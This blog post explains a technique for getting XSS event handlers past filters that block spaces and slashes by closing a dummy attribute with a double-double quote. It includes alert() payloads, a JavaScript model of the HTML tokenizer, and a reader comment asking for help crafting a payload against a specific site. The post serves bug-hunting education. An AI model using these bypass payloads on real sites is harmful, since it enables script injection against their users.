Bypass blank/slash filter for XSS with a simple trick (double-double quote "")

Hi, hackers.

The XSS pattern I'm going to talk about today is not a new technique, just one I didn't know about. (I should have looked at the payloads more carefully..)

Event-handler XSS is usually hard to pull off when slashes and blank characters are being filtered.
If you make good use of an attribute value that is processed as "" (double-double quote), then in some environments you can separate an attribute value, i.e. an event handler, from the preceding attribute without any space or slash.


If slash and blank are filtered, it's just simple: close a dummy attribute with "" and start the event handler right after it, e.g. whatthe=""onload=alert(45).


Principle (Why does it execute?)

Once the tag name has been separated from its first attribute by a space or slash, the remaining HTML attributes can be separated from each other with "" alone.

So at first sight, after the dummy attribute whatthe="", the characters onload=alert(45) that follow it look like they wouldn't be processed as an attribute. But they are the first word after the closing quote, so the parser splits them off as a new attribute: in the HTML tokenizer, a non-whitespace character right after a quoted attribute value is only a parse error (missing whitespace between attributes), and that character is reconsumed as the start of the next attribute name. One caveat when building the payload: the dummy attribute must not have the same name as the handler, because a duplicate attribute name is dropped by the parser, so onload=""onload=alert(45) leaves you with only the empty onload.
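To make the parsing step concrete, here is an added example (not code from the original post or from XSpear): a small model of the WHATWG HTML tokenizer states that a start tag goes through, run over payloads constructed to match the description above (a dummy attribute named whatthe, then onload=alert(45), with /; as the only separator after the tag name). The payload strings and the filter they target are assumptions for illustration, not copied from the post.

```javascript
// Added example (not from the original post or XSpear): a minimal model of the
// WHATWG HTML tokenizer states involved in a start tag, enough to show why a
// closing `"` lets the next attribute begin with no space or slash. The payloads
// below are constructed to match the post's description (dummy attribute
// `whatthe`, then `onload=alert(45)`); they are not copied from the post.
const WS = new Set(['\t', '\n', '\f', ' ']);

function tokenizeStartTag(tag) {
  if (tag[0] !== '<') throw new Error('expected a start tag');
  const tok = { name: '', attrs: [], selfClosing: false };
  let cur = null; // attribute currently being built
  let state = 'tagName';

  // Per spec, a second attribute with the same name is a parse error and is
  // dropped, so `onload=""onload=alert(45)` keeps only the empty first one.
  const finishAttr = () => {
    if (cur && !tok.attrs.some(([n]) => n === cur.name)) tok.attrs.push([cur.name, cur.value]);
    cur = null;
  };
  const startAttr = () => { finishAttr(); cur = { name: '', value: '' }; };
  const emit = () => { finishAttr(); return tok; };

  for (let i = 1; i < tag.length;) {
    const c = tag[i];
    let reconsume = false; // spec "reconsume": handle c again in the new state
    switch (state) {
      case 'tagName':
        if (WS.has(c)) state = 'beforeAttrName';
        else if (c === '/') state = 'selfClosing';
        else if (c === '>') return emit();
        else tok.name += c.toLowerCase();
        break;
      case 'beforeAttrName':
        if (WS.has(c)) break;
        if (c === '/' || c === '>') state = 'afterAttrName';
        else { startAttr(); state = 'attrName'; }
        reconsume = true;
        break;
      case 'attrName':
        if (WS.has(c) || c === '/' || c === '>') { state = 'afterAttrName'; reconsume = true; }
        else if (c === '=') state = 'beforeAttrValue';
        else cur.name += c.toLowerCase(); // `;` or `"` here is an error but still appended
        break;
      case 'afterAttrName':
        if (WS.has(c)) break;
        if (c === '/') state = 'selfClosing';
        else if (c === '=') state = 'beforeAttrValue';
        else if (c === '>') return emit();
        else { startAttr(); state = 'attrName'; reconsume = true; }
        break;
      case 'beforeAttrValue':
        if (WS.has(c)) break;
        if (c === '"') state = 'valueDouble';
        else if (c === "'") state = 'valueSingle';
        else if (c === '>') return emit(); // missing-attribute-value error
        else { state = 'valueUnquoted'; reconsume = true; }
        break;
      case 'valueDouble':
        if (c === '"') state = 'afterValueQuoted'; else cur.value += c;
        break;
      case 'valueSingle':
        if (c === "'") state = 'afterValueQuoted'; else cur.value += c;
        break;
      case 'valueUnquoted':
        if (WS.has(c)) state = 'beforeAttrName';
        else if (c === '>') return emit();
        else cur.value += c;
        break;
      case 'afterValueQuoted':
        // The state behind the trick: a non-whitespace character right after the
        // closing quote is only a missing-whitespace-between-attributes parse
        // error; it is reconsumed as the start of the next attribute name.
        if (WS.has(c)) state = 'beforeAttrName';
        else if (c === '/') state = 'selfClosing';
        else if (c === '>') return emit();
        else { state = 'beforeAttrName'; reconsume = true; }
        break;
      case 'selfClosing':
        // Same leniency for `/`: anything but `>` is reconsumed before the next
        // attribute name, which is why `<svg/onload=...>` parses like `<svg onload=...>`.
        if (c === '>') { tok.selfClosing = true; return emit(); }
        state = 'beforeAttrName'; reconsume = true;
        break;
    }
    if (!reconsume) i++;
  }
  throw new Error('unterminated start tag');
}

// Attributes a browser would register as event handlers (on*).
function eventHandlers(tag) {
  return tokenizeStartTag(tag).attrs.filter(([n]) => /^on[a-z]+$/.test(n));
}

// Constructed payloads: the space/slash-filtered case using `/;`, and the
// duplicate-name pitfall where the handler body is lost.
for (const p of ['<svg/;whatthe=""onload=alert(45)>', '<svg onload=""onload=alert(45)>']) {
  console.log(p, '=>', JSON.stringify(tokenizeStartTag(p).attrs));
}
```

Running it shows the first payload yielding two attributes, ;whatthe (empty) and onload=alert(45), while the second keeps only an empty onload, which is why the dummy attribute needs a different name from the handler.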

My case

/ => filtered
%20 => filtered
/; => not filtered


XSpear updated

I committed this pattern to XSpear and pushed the update right away.

Add event handler pattern

Add common XSS Pattern

Add event handler pattern (1.1.6 commit)


Security engineer, Rubyist, Gopher and H4cker!



  1. Hi bro,
    I am following your write-ups about your XSS bug hunting on your blog.
    Can you help me create a payload for a website which is filtering only these symbols?
    The website is not filtering the below symbols:
    ' / ; ( )

    And we can only execute these payloads inside <p> our code </p> tags.

    Thanks in advance, bro :)

    1. Hi.
      If your code is inserted in an HTML area, <> is required.
      However, if there is a part that references the <p></p> code and causes a DOM write, there is a possibility of DOM XSS.

      Typically, hunters pass on HTML areas where lt and gt can't be used because of encoding.

      Happy Hacking!